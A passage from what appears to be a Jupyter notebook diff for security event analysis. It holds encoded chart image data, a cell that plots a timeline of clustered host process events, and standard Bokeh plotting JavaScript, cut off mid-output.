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"
+     },
+     "metadata": {
+      "needs_background": "light"
+     }
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "### Time showing clustered vs. original data"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "source": [
+    "# Show timeline of events - clustered events\n",
+    "\n",
+    "nbdisplay.display_timeline(\n",
+    "    data=clus_events,\n",
+    "    #overlay_data=processes_on_host,\n",
+    "    title='Distinct Host Processes (bottom) and All Proceses (top)')"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1001\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible 